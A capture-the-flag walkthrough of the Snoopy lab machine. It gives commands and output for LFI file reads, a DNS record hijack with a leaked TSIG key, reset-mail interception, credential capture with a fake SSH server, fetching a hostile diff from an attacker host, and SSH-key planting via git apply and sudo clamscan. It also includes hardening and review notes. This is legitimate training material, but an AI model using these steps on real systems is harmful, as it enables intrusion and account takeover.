Scan

> TARGET=10.129.219.171 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: SnoopySec Bootstrap Template - Index
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Domain: snoopy.htb
  • http://10.129.219.171/about.html
cschultz@snoopy.htb
sbrown@snoopy.htb
hangel@snoopy.htb
lpelt@snoopy.htb
info@snoopy.htb
  • http://10.129.219.171/contact.html
POST /forms/contact.php HTTP/1.1
Unable to load the "PHP Email Form" Library!

# note the following notice
Attention:  As we migrate DNS records to our new domain please be advised that our mailserver 'mail.snoopy.htb' is currently offline.
  • LFI fuzzing on /download?file= found a local file read vulnerability
> wfuzz -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://snoopy.htb/download?file=FUZZ' --hh 0
....//....//....//....//etc/passwd
  • Subdomain fuzz
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://snoopy.htb/" -H "Host: FUZZ.snoopy.htb"

000000582:   200        0 L      141 W      3132 Ch     "mm"

Web enum via local file read

> curl http://snoopy.htb/download?file=....//....//....//....//etc/passwd -o- >file && unzip -p file | grep home
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   796  100   796    0     0    833      0 --:--:-- --:--:-- --:--:--   833
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
clamav:x:1002:1003::/home/clamav:/usr/sbin/nologin
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash
  • Zone transfers are allowed, allow-update enables dynamic DNS, and the rndc key can also be found in /etc/bind/named.conf.
  • This can be abused with a dynamic DNS update attack.
# /etc/bind/named.conf.options
options {
        directory "/var/cache/bind";
        dnssec-validation no;
        allow-transfer {10.0.0.0/8;};

        //listen-on-v6 { any; };
};


# /etc/bind/named.conf.local
zone "snoopy.htb" IN {
    type master;
    file "/var/lib/bind/db.snoopy.htb";
    allow-update { key "rndc-key"; };
    allow-transfer { 10.0.0.0/8; };
};


# /etc/bind/named.conf
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";

key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};
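The three fragments above, restated with the settings that would have closed this path (an added example, not the box's configuration): zone transfers limited to a named secondary, dynamic updates scoped to the single record that needs them under a key separate from rndc's, and both keys kept in files readable only by root and bind so a file-read bug in the web tier cannot expose them. The secondary address 10.0.0.5 and the key name ddns-key are assumptions.

```conf
// Hardened counterpart to the named.conf fragments above (added example,
// not the box's configuration). 10.0.0.5 is a hypothetical secondary
// nameserver and "ddns-key" a hypothetical key used only for dynamic updates.

// /etc/bind/named.conf.options
options {
        directory "/var/cache/bind";
        dnssec-validation auto;       // was: no
        allow-transfer { none; };     // deny AXFR globally; grant per zone below
        allow-update { none; };       // no dynamic updates unless a zone opts in
};

// /etc/bind/named.conf.local
zone "snoopy.htb" IN {
    type master;
    file "/var/lib/bind/db.snoopy.htb";
    // Only the secondary may pull the zone, instead of all of 10.0.0.0/8.
    allow-transfer { 10.0.0.5; };
    // Replace allow-update with a policy limited to the one record that
    // needs it; update-policy and allow-update are mutually exclusive.
    update-policy {
        grant ddns-key. name mail.snoopy.htb. A;
    };
};

// /etc/bind/named.conf
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
// Keep secrets out of the world-readable main config:
//   /etc/bind/rndc.key  (root:bind, mode 0640) -- rndc control channel only
//   /etc/bind/ddns.key  (root:bind, mode 0640) -- dynamic updates only
include "/etc/bind/rndc.key";
include "/etc/bind/ddns.key";

// /etc/bind/ddns.key  (generate with: tsig-keygen -a hmac-sha256 ddns-key)
key "ddns-key" {
    algorithm hmac-sha256;
    secret "<generated-secret-placeholder>";
};
```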

Login to mattermost

  • On the subdomain mm.snoopy.htb there is a password reset form: http://mm.snoopy.htb/reset_password
  • However, the DNS record for the mail server is missing, so the reset mail cannot be delivered.
  • The goal is to fix the DNS record so that we receive the password reset mail.
  • Add mail.snoopy.htb to the target's DNS: we have the rndc key from above, and DDNS is enabled on the target.
> echo 'server ns1.snoopy.htb\nupdate add mail.snoopy.htb. 3600 A <attacker>\nsend\nquit' | nsupdate -y hmac-sha256:rndc-key:BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=

# Check the domain is added via
> dig axfr @10.129.219.171 snoopy.htb
  • Request a password reset for an email account via http://mm.snoopy.htb/reset_password and listen for the mail
# note that the server resets the new record very quickly
> python -m smtpd -n -c DebuggingServer <attacker>:25
  • Trim the returned email correctly: the body is quoted-printable encoded, so "=3D" decodes to "=" and a trailing "=" is a soft line break that has to be joined
# example
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Ddtc3c='
b'e3xsh143tu3wuem35x7fii47kudm4u6rtdpmp9a19u8gux54oamr74jc46y )'

# should be trimmed to be:
http://mm.snoopy.htb/reset_password_complete?token=dtc3ce3xsh143tu3wuem35x7fii47kudm4u6rtdpmp9a19u8gux54oamr74jc46y
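Decoding the quoted-printable body with the standard library instead of trimming by hand (example added here, not from the original writeup; the sample bytes are the two DebuggingServer lines above, re-typed as constructed input):

```python
import quopri
import re

# Constructed sample: the two body lines printed by the DebuggingServer above,
# as raw bytes. The trailing '=' on the first line is a quoted-printable soft
# line break and "=3D" is an escaped '='.
SAMPLE_BODY = (
    b"Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Ddtc3c=\n"
    b"e3xsh143tu3wuem35x7fii47kudm4u6rtdpmp9a19u8gux54oamr74jc46y )\n"
)

# A URL runs until whitespace or a bracket; the mail wraps links in "( ... )".
URL_RE = re.compile(r"https?://[^\s()<>]+")


def decode_qp_body(body: bytes) -> str:
    """Undo quoted-printable: join soft line breaks and turn =XX into bytes."""
    return quopri.decodestring(body).decode("utf-8", errors="replace")


def extract_reset_links(body: bytes) -> list[str]:
    """Return every URL in the decoded body, in order of appearance."""
    return URL_RE.findall(decode_qp_body(body))


if __name__ == "__main__":
    for link in extract_reset_links(SAMPLE_BODY):
        print(link)
```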
  • We can do this for any of the users we found on the system
cschultz@snoopy.htb
sbrown@snoopy.htb
hangel@snoopy.htb
lpelt@snoopy.htb
info@snoopy.htb
pjean@snoopy.htb
cbrown@snoopy.htb
admin@local.htb
  • After logging in, we see a message in the channel Tower Square and learn that there is a new channel for provisioning servers.
cbrown
1:18 PM
Hey everyone, I just created a new channel dedicated to submitting requests for new server provisions as we start to roll out our new DevSecOps tool. 
  • There is a channel for provisioning servers, Server Provisioning. In that channel there is a custom command, /server_provision, which lets you send a request to devops to provision a server. This results in a devops person attempting to log in to an SSH server that you specify.
  • Set up a paramiko SSH server: https://stackoverflow.com/questions/71368098/creating-python-sshserver
  • and print out the username and password received from the client
> python sshserver.py
[+] Listening for connection ...
[+] Got a connection! from ('10.129.219.171', 44908)
cbrown sn00pedcr3dential!!!

user: sbrown

  • Log in as cbrown and check sudo rights
cbrown@snoopy:~$ sudo -l
[sudo] password for cbrown: 
Matching Defaults entries for cbrown on snoopy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User cbrown may run the following commands on snoopy:
    (sbrown) PASSWD: /usr/bin/git apply *
diff --git a/symlink b/symlink2
similarity index 100%
rename from symlink
rename to symlink2
--
diff --git /dev/null b/symlink2/authorized_keys
new file mode 100644
index 0000000..b249f1a
--- /dev/null
+++ b/symlink2/authorized_keys
@@ -0,0 +1,1 @@
+<content from your .ssh/id_rsa.pub>
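Review bot: the second region creates `b/symlink2/authorized_keys` beneath a path that the first region has just renamed from `symlink`, and the note below says that link points into /home/sbrown/.ssh, so the new file is written outside the repository. A symlink rename immediately followed by a file added under the renamed path is the pattern to reject in review, and an `authorized_keys` file appearing in a patch at all should stop the apply; the sudoers rule `(sbrown) PASSWD: /usr/bin/git apply *` is what turns this into a user-to-user escalation and should not exist.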
  • We need to create a local repo and apply the above diff through a symbolic link into /home/sbrown/.ssh, so that our public key ends up in /home/sbrown/.ssh/authorized_keys and we can ssh into the target with it.
# create a repo
cbrown@snoopy:~$ mkdir test
cbrown@snoopy:~$ cd test/
cbrown@snoopy:~/test$ git init
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint: 
hint:   git config --global init.defaultBranch <name>
hint: 
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint: 
hint:   git branch -m <name>
Initialized empty Git repository in /home/cbrown/test/.git/

# get the malicious diff
cbrown@snoopy:~/test$ wget http://<attacker>/test.diff

# create symbolic link
cbrown@snoopy:~/test$ ln -s /home/sbrown/.ssh symlink

# change folder permission where necessary
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown/test/

# apply the diff
cbrown@snoopy:~/test$ sudo -u sbrown /usr/bin/git apply test.diff

cbrown@snoopy:~/test$ ls -la
total 16
drwxrwxrwx 3 cbrown cbrown 4096 May  7 23:59 .
drwxrwxrwx 6 cbrown cbrown 4096 May  7 23:35 ..
drwxrwxr-x 7 cbrown cbrown 4096 May  7 23:35 .git
lrwxrwxrwx 1 sbrown sbrown   17 May  7 23:59 renamed-symlink -> /home/sbrown/.ssh
-rw-rw-r-- 1 cbrown cbrown  835 May  7 23:59 test.diff
  • Log in as sbrown and get the user flag
> ssh sbrown@snoopy.htb

sbrown@snoopy:~$ cat user.txt 
ef4af103ef2f2a0a73f7e8b46a4116fe

Privilege escalation

  • Check sudo rights
sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User sbrown may run the following commands on snoopy:
    (root) NOPASSWD: /usr/local/bin/clamscan
  • We can execute clamscan as root.
  • To learn how this can be exploited, read the following posts:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-clamav-privilege-escalation/
https://www.youtube.com/watch?v=pplqa5MnztQ
https://docs.clamav.net/manual/Signatures/YaraRules.html
  • But there is an issue with this approach as it stands. Once the detected file is copied, it still carries its original permissions and ownership, so we cannot read things like /etc/shadow or /root/root.txt.
  • To gain access as root, we can adopt the same strategy we used to get the user shell.
  • First, we move any /root/.ssh/authorized_keys away from there, then copy /home/sbrown/.ssh/authorized_keys into its place.
  • A simple YARA rule that can be used is below:
rule test
{
  strings:
    $abc = "root"
  condition:
    $abc
}
  • Transfer the YARA rule to the target and execute our strategy
# move the existing file away
sbrown@snoopy:~$ sudo /usr/local/bin/clamscan -i -d test.yara /root/.ssh/authorized_keys --move=/tmp/results/
/root/.ssh/authorized_keys: YARA.test.UNOFFICIAL FOUND
/root/.ssh/authorized_keys: moved to '/tmp/results/authorized_keys.001'

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 1.0.0
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.008 sec (0 m 0 s)
Start Date: 2023:05:08 02:56:20
End Date:   2023:05:08 02:56:20

# move our copy there
sbrown@snoopy:~$ sudo /usr/local/bin/clamscan -i -d test.yara /home/sbrown/.ssh/authorized_keys --copy=/root/.ssh/
/home/sbrown/.ssh/authorized_keys: YARA.test.UNOFFICIAL FOUND
/home/sbrown/.ssh/authorized_keys: copied to '/root/.ssh/authorized_keys'

----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 1.0.0
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.009 sec (0 m 0 s)
Start Date: 2023:05:08 02:57:04
End Date:   2023:05:08 02:57:04
  • Now SSH to the target as root and read the flag
root@snoopy:~# cat root.txt 
0631bb9f26eba71c438c5ed5f691d5a7